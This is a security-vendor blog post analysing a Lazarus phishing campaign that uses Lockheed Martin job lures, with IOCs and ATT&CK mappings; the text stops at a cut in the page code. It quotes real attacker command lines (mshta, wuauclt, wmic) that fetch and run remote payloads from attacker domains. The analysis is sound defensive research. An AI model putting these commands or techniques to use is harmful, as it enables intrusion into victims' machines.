9.025 0 0 0-12.264 0 9.544 9.544 0 0 0 0 
12.609zm10.708-9.106a3.558 3.558 0 0 1-2.654 3.568l3.066 4.806h-2.381l-2.791-4.668h-1.418v4.668h-2.014v-11.9h4.393a3.924 3.924 0 0 1 2.747.963 3.3 3.3 0 0 1 1.052 2.562zm-6.178-1.65v3.479h2.106a2.06 2.06 0 0 0 1.44-.481 1.622 1.622 0 0 0 .526-1.258q0-1.738-1.966-1.739zM784.087 178.724l-23.814-63.187h-21.219l34.746 88.2s-15.371 36.539-15.365 36.536c10.113 0 21.176-.714 25.5-11.37 10.152-24.993 45.505-113.365 45.505-113.365h-21.221zM704.493 210.246s19.7-.365 19.7-13.729v-120.033h-19.7zM663.646 127.976c-5.485-7.649-16.2-15.073-31.971-15.073-26.92 0-47.221 20.937-47.221 48.7 0 12.977 4.437 25.036 12.494 33.955 8.715 9.649 20.724 14.748 34.727 14.748 13.567 0 25.184-5.534 31.971-15.014v14.951s19.7-.312 19.7-13.719v-80.99h-19.7zm-29.5 63.789c-11.908 0-29.72-7.947-30-29.839v-.157c0-17.288 12.754-30.325 29.666-30.325 12.633 0 22.9 6.6 27.487 17.711a27.268 27.268 0 0 1 2.509 12.733 32.62 32.62 0 0 1-3.023 12.869c-4.633 10.65-14.595 17.008-26.641 17.008zM548.568 166.874c0 15.9-8.26 24.745-23.244 24.891-15.2 0-22.587-8.627-22.587-26.373v-49.855h-19.695v53.806c0 7.767 1.309 18.842 7.548 27.506 6.375 8.854 16.452 13.382 29.945 13.459h.553c16.138 0 24.448-7.315 28.468-13v12.934s18.707-.319 18.707-13.062v-81.643h-19.7zM876.661 152.965c-10.235-4.424-17.676-8.25-17.545-14.185.087-3.927 5.259-7.687 10.637-7.5 5.756.2 10.023 4.168 12.4 7.344 0 0 10.76-9.2 12.062-10.183a30.164 30.164 0 0 0-25.661-14.657 27.317 27.317 0 0 0-28.054 26.48c-.285 12.937 7.292 18.276 17.23 23.913l16.357 9.2c3.774 2.639 5.554 4.609 5.464 8.669-.14 6.362-5.461 10.486-12.352 10.893-5.069.3-9.232-2.631-13.176-6.759-7.677-8.034-19.46-4.172-23.065-3.01 7.5 17.24 21.68 27.279 35.849 27.591 17.844.393 32.118-12.777 32.5-29.983.174-8.286-3.456-18.578-22.646-27.813z" fill="#262626"/><path d="M62.924 126.929c0-34.142 26.991-61.918 60.167-61.918a60.285 60.285 0 0 1 60.217 60.217c0 26.507-22.786 48.316-40.348 59.523 6.813 3.887 21.849 7.969 36.245 9.289a86.906 86.906 0 0 0 33.843-68.811 89.957 89.957 0 1 0-179.913 0c0 
29.958 12.474 56.571 36.072 76.964 22.063 19.065 54.336 31.791 91.081 37.816 7.96-4.4 21.576-17.387 26.681-24.99-30.688-3.947-59.732-11.431-79.2-21.645-29.757-15.609-44.845-37.964-44.845-66.445z" fill="#fff"/></svg> </span> <span class="q-logo-text">Community</span> </a> <div class="q-user-menu"> <div class="q-user-menu__icon hidden"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="19" height="23"> <g fill="currentColor"> <g transform="translate(3 -.093)"> <path d="M6.284.092a5.709 5.709 0 1 1-.002 11.418A5.709 5.709 0 0 1 6.284.092"></path> </g> <g transform="translate(0 11.907)"> <path d="M.187 7.575C-.476 9.195.703 11 2.47 11h13.922c1.767 0 2.946-1.804 2.283-3.425C16.945 3.45 13.445.65 9.431.65c-4.015 0-7.55 2.8-9.244 6.925"></path> </g> </g> </svg> </div> </div> </div> </header><!-- #masthead --> </div> <div class="q-search__container"> <div class="q-search"> <div id="searchbox"> <div class="q-coveo__wrapper"> <div class="q-coveo-searchbutton"> <div class="CoveoSearchButton"></div> </div> <div class="q-coveo-querybox"> <div class="CoveoOmnibox" data-enable-query-suggest-addon="true"></div> </div> </div> </div> </div> </div> <div id="page" class="q-main_content"> <div class='q-home-header__sidebar q-blog__home-link'> <div class='q-blog__home-link-wrapper'> <div class="q-menu__home-container"><ul id="menu-blog-home" class="menu"><a href='/'> <img class='link-arrow' src='https://d1uyme8f6ss6qi.cloudfront.net/image/icon/link-arrow-left.svg' width='7' height='10'> <span>Blog Home</span> </a></li> </ul></div> </div> </div> <div class="q-main_content-container"> <main id="primary" class="site-main q-single__post-content"> <article id="post-29363" class="post-29363 post type-post status-publish format-standard hentry category-vulnerabilities-threat-research"> <header class="entry-header"> <h1 class="q-blog__post-title">LolZarus: Lazarus Group Incorporating Lolbins into Campaigns</h1> <div 
class="q-post__entry-header-outerwrapper"> <div class="q-post__entry-header-wrapper"> <div class="q-post__entry-header"> <div class="q-post__entry-avatar"> <img src='https://secure.gravatar.com/avatar/a5da0efab1b59e29fb9828966a05e5a0?s=110&d=mm&r=g' width='54' alt='Akshat Pradhan' /> </div> <div class="entry-meta q-post__entry-meta"> <div class="q-post__entry-author"> <span class="byline"> <span class="author vcard"><a class="url fn n" href="https://blog.qualys.com/author/apradhan">Akshat Pradhan</a></span>, Senior Engineer, Threat Research, Qualys</span> </div> <div class="q-post__entry-time"> <span class="posted-on"><a href="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" rel="bookmark"><time class="entry-date published" datetime="2022-02-08T03:24:37-08:00">February 8, 2022</time><time class="updated" datetime="2022-12-23T00:09:48-08:00">December 23, 2022</time></a></span> - 5 min read </div> </div> </div> <div class="q-post__entry-vote"> <div class='likebutton likebutton_json' data-postid='29363' data-style='style1'></div> </div> </div> </div> <p class='q-last-modified-date'><strong>Last updated on:</strong> <em>December 23, 2022</em></p> </header> <div class="entry-content q-single__post-wrapper q-has-toc"> <div class="q-single__post--toc"><div class="toc"><h4>Table of Contents</h4><ul><li><a href='#sample-analysis'>Sample Analysis</a></li><li><a href='#conclusion'>Conclusion</a></li><li><a href='#attck-mapping'>ATT&CK Mapping</a></li><li><a href='#iocs'>IOCS</a></li><li><a href='#domains'>Domains</a></li></ul></div></div> <div class="q-single__post--content"> <p><em>Qualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin. 
This blog details the markers of this campaign, including the macro content, campaign flow and phishing themes of our identified variants and of older variants that have been attributed to Lazarus by other vendors.</em></p> <p>The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. The identified variants target job applicants for Lockheed Martin Corporation, which is an American aerospace, arms, defence, information security, and technology corporation. This is thematically similar to other observed variants where Lazarus has posed as defence companies like <a href="https://www.northropgrumman.com/">Northrop Grumman</a> and <a href="https://www.baesystems.com/en/home">BAE Systems</a> with job openings. We refer to this campaign as “LolZarus” due to the use of different lolbins in observed samples, some of which represent the first recorded use of that lolbin by a well-known adversary.</p> <h2 id="sample-analysis" class="wp-block-heading">Sample Analysis</h2> <p>We identified two phishing documents: “Lockheed_Martin_JobOpportunities.docx” and “Salary_Lockheed_Martin_job_opportunities_confidential.doc”. Both variants were authored by the same user, named “Mickey”. 
The methodology used for control flow hijack and the macro content is similar across both samples.</p> <p><strong>MD5:</strong> a27a9324d282d920e495832933d486ee</p> <p><strong>Name:</strong> Salary_Lockheed_Martin_job_opportunities_confidential.doc</p> <span id="more-29363"></span> <figure class="wp-block-image size-full"><a data-fancybox href="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png"><img loading="lazy" decoding="async" width="1237" height="887" data-attachment-id="29364" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig1-8" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" data-orig-size="1237,887" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig1" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-300x215.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-1070x767.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" alt="" class="wp-image-29364" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png 1237w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-300x215.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-1070x767.png 1070w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1-768x551.png 768w" sizes="(max-width: 1237px) 100vw, 1237px" /></a><figcaption class="wp-element-caption">Fig1. LockHeed Recruitment Lure</figcaption></figure> <p>The macro uses aliases to rename the APIs that it uses (fig. 
2).</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="602" height="242" data-attachment-id="29365" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig2-8" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png" data-orig-size="602,242" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig2" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2-300x121.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png" alt="" class="wp-image-29365" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2.png 602w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig2-300x121.png 300w" sizes="(max-width: 602px) 100vw, 602px" /><figcaption class="wp-element-caption">Fig2. Renamed API aliases.</figcaption></figure></div> <p>The initial entry point for the macro is via the ActiveX Frame1_Layout to automatically execute once ActiveX control is enabled (fig. 
3).</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="452" height="69" data-attachment-id="29367" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig3-7" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png" data-orig-size="452,69" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig3" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3-300x46.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png" alt="" class="wp-image-29367" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3.png 452w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig3-300x46.png 300w" sizes="(max-width: 452px) 100vw, 452px" /><figcaption class="wp-element-caption">Fig3. EntryPoint of obfuscated Macro.</figcaption></figure></div> <p>The macro starts by loading WMVCORE.DLL, which is a legitimate windows dll for windows media. Interestingly, to make the macro seem more innocuous, Lazarus uses function names identical to the exported functions of WMVCORE.DLL and variable names thematically related to playback (fig. 
4).</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="602" height="294" data-attachment-id="29368" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig4-4" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png" data-orig-size="602,294" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig4" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4-300x147.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png" alt="" class="wp-image-29368" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4.png 602w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig4-300x147.png 300w" sizes="(max-width: 602px) 100vw, 602px" /><figcaption class="wp-element-caption">Fig.4 WMV playback variables and wmvcore.dll function names</figcaption></figure></div> <p>The macro uses a check for a document variable before entering its main functionality block. This variable is set at the end to ensure that subsequent opening of the document does not execute it again.</p> <p>The second stage payload is shellcode that is embedded as a base64 encoded string array inside the macro that is decoded by using CryptStringToBinaryW (fig. 5). 
Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap.</p> <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1046" height="330" data-attachment-id="29369" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig5a" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png" data-orig-size="1046,330" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig5a" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a-300x95.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png" alt="" class="wp-image-29369" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a.png 1046w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a-300x95.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5a-768x242.png 768w" sizes="(max-width: 1046px) 100vw, 1046px" /></figure> <div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-3 wp-block-columns-is-layout-flex"> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29370" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig5b" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" data-orig-size="263,39" 
data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig5b" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5b.png" alt="" class="wp-image-29370" width="371" height="55"/></figure> </div> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29371" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig5c" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png" data-orig-size="338,39" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig5c" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c-300x35.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png" alt="" class="wp-image-29371" width="396" height="46" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c.png 338w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig5c-300x35.png 300w" sizes="(max-width: 396px) 100vw, 396px" /></figure> </div> </div> <p class="has-text-align-center has-small-font-size">Fig.5 
Payload decoded via CryptStringToBinaryW.</p> <p>The decoded shellcode then overwrites the <em>WMIsAvailableOffline</em> function from WMVCORE.dll by retrieving its address and changing its memory permissions.</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="736" height="306" data-attachment-id="29373" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig6a" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png" data-orig-size="736,306" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig6a" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a-300x125.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png" alt="" class="wp-image-29373" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a.png 736w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6a-300x125.png 300w" sizes="(max-width: 736px) 100vw, 736px" /></figure></div> <p></p> <div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-4 wp-block-columns-is-layout-flex"> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29374" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig6b" 
data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" data-orig-size="297,62" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig6b" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6b.png" alt="" class="wp-image-29374" width="302" height="63"/></figure> </div> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" data-attachment-id="29375" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig6c" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" data-orig-size="178,133" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig6c" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig6c.png" alt="" class="wp-image-29375" width="171" height="128"/></figure> </div> </div> <p class="has-text-align-center has-small-font-size">Fig.6 VirtualProtect and memcpy’s.</p> <p>The callback to the shellcode is achieved by retrieving the 
KernelCallbackTable pointer from the PEB structure of the current process via NtQueryInformationProcess, and then patching the <em>_fnDWORD</em> pointer to point to <em>WMIsAvailableOffline</em>. Whenever WinWord makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as <a href="https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/">FinFisher</a>. Lazarus has also used other novel methods to execute shellcode, such as using the function <em>EnumSystemLocalesA</em> as a callback to shellcode written to an executable heap.</p> <p>The macro then sets a document variable to ensure that subsequent runs do not execute the shellcode decode and the KernelCallbackTable hijack again. It also retrieves a decoy document from <em>https://markettrendingcenter[.]com/lk_job_oppor[.]docx</em> and displays it (fig. 7).</p> <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="904" height="110" data-attachment-id="29380" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/pic-7a" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png" data-orig-size="904,110" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="pic-7a" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a-300x37.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png" alt="" class="wp-image-29380" 
srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a.png 904w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a-300x37.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/pic-7a-768x93.png 768w" sizes="(max-width: 904px) 100vw, 904px" /></figure> <figure class="wp-block-image size-full"><a data-fancybox href="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png"><img loading="lazy" decoding="async" width="1237" height="892" data-attachment-id="29378" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig7-4" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png" data-orig-size="1237,892" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig7" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-300x216.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-1070x772.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png" alt="" class="wp-image-29378" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7.png 1237w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-300x216.png 300w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-1070x772.png 1070w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig7-768x554.png 768w" sizes="(max-width: 1237px) 100vw, 1237px" /></a><figcaption class="wp-element-caption">Fig.7 Decoy Document.</figcaption></figure> <p>The shellcode mainly sets up a periodic beacon out to <em>https://markettrendingcenter[.]com/member[.]htm</em> by creating a new staging folder 
<code>C:\WMAuthorization</code>, writing a vbs file (WMVxEncd.vbs) to it, and creating a corresponding Scheduled task to run the vbs file every 20 minutes (fig. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command.</p> <pre class="wp-block-preformatted">shellObj.Run "forfiles /p c:\windows /m HelpPane.exe /c ""mshta C:\WMAuthorization\WMPlaybackSrv ""https://markettrendingcenter.com/member.htm""""", 0, True</pre> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="708" height="824" data-attachment-id="29379" data-permalink="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/attachment/fig8-3" data-orig-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png" data-orig-size="708,824" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"0"}" data-image-title="Fig8" data-image-description="" data-image-caption="" data-medium-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8-300x349.png" data-large-file="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png" tabindex="0" role="button" src="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png" alt="" class="wp-image-29379" srcset="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8.png 708w, https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig8-300x349.png 300w" sizes="(max-width: 708px) 100vw, 708px" /><figcaption class="wp-element-caption">Fig.8 Schedule Task Dump</figcaption></figure></div> <p>Here, WMPlaybackSrv is a renamed wscript.exe and <em>WindowsMediaPlayerVxEncdSrv</em> is a renamed mshta.exe. 
Another variant of the campaign uses the lolbin <em>wuauclt</em>.</p> <pre class="wp-block-preformatted">cmd /C ''C:\Windows\system32\wuauclt.exe' /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer</pre> <p>Earlier variants have used a copy of wmic.</p> <pre class="wp-block-preformatted">%COMSPEC% /c Start /miN c:\Intel\hidasvc ENVIRONMENT get STATUS /FORMAT:”hxxps://www.advantims[.]com/GfxCPL.xsl”</pre> <p>Additional vendors have also identified a variant that uses <a href="https://twitter.com/_CPResearch_/status/1352310521752662018">pcalua.exe</a>.<br>Unfortunately, we were unable to get further details about the remote htm payload as it returns a 404 error.</p> <h2 id="conclusion" class="wp-block-heading">Conclusion</h2> <p>We attribute this campaign to Lazarus as there is significant overlap in the macro content, campaign flow, and phishing themes of our identified variants as well as older variants that have been attributed to Lazarus by other <a href="https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/">vendors</a>. Additional vendors have reported on the current campaign while attributing it to <a href="https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/">Lazarus</a>.</p> <p>Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign. 
Qualys will continue to monitor for other similar phishing lures related to Lazarus.</p> <p>Existing customers of Qualys can use the following QQL queries to identify this activity:</p> <pre class="wp-block-code"><div class="q-code"><code>mitre.attack.technique.id:"Q0026" is mitre.attack.technique.id:"T1218.005" mitre.attack.technique.id:"T1202" mitre.attack.technique.id:"T1036.003" mitre.attack.technique.id:"T1059.005"</code></div></pre> <h2 id="attck-mapping" class="wp-block-heading">ATT&amp;CK Mapping</h2> <p><a href="https://attack.mitre.org/techniques/T1566/001/">Phishing: Spearphishing Attachment (T1566.001)</a></p> <p><a href="https://attack.mitre.org/techniques/T1047/">Windows Management Instrumentation (T1047)</a></p> <p><a href="https://attack.mitre.org/techniques/T1036/003/">Masquerading: Rename System Utilities (T1036.003)</a></p> <p><a href="https://attack.mitre.org/techniques/T1218/005/">Signed Binary Proxy Execution: Mshta (T1218.005)</a></p> <p><a href="https://attack.mitre.org/techniques/T1059/005/">Command and Scripting Interpreter: Visual Basic (T1059.005)</a></p> <p><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task (T1053.005)</a></p> <p><a href="https://attack.mitre.org/techniques/T1106/">Native API (T1106)</a></p> <p><a href="https://attack.mitre.org/techniques/T1574/">Hijack Execution Flow (T1574)</a></p> <p><a href="https://attack.mitre.org/techniques/T1059/003/">Command and Scripting Interpreter: Windows Command Shell (T1059.003)</a></p> <h2 id="iocs" class="wp-block-heading">IOCs</h2> <h3 class="wp-block-heading">Hashes</h3> <pre class="wp-block-code"><div class="q-code"><code>e87b575b2ddfb9d4d692e3b8627e3921<br>a27a9324d282d920e495832933d486ee<br>3f326da2affb0f7f2a4c5c95ffc660cc<br>490c885dc7ba0f32c07ddfe02a04bbb9<br>712a8e4d3ce36d72ff74b785aaf18cb0<br>a27a9324d282d920e495832933d486ee<br>f2a0e9034d67f8200993c4fa8e4f5d15</code></div></pre> <h2 id="domains" 
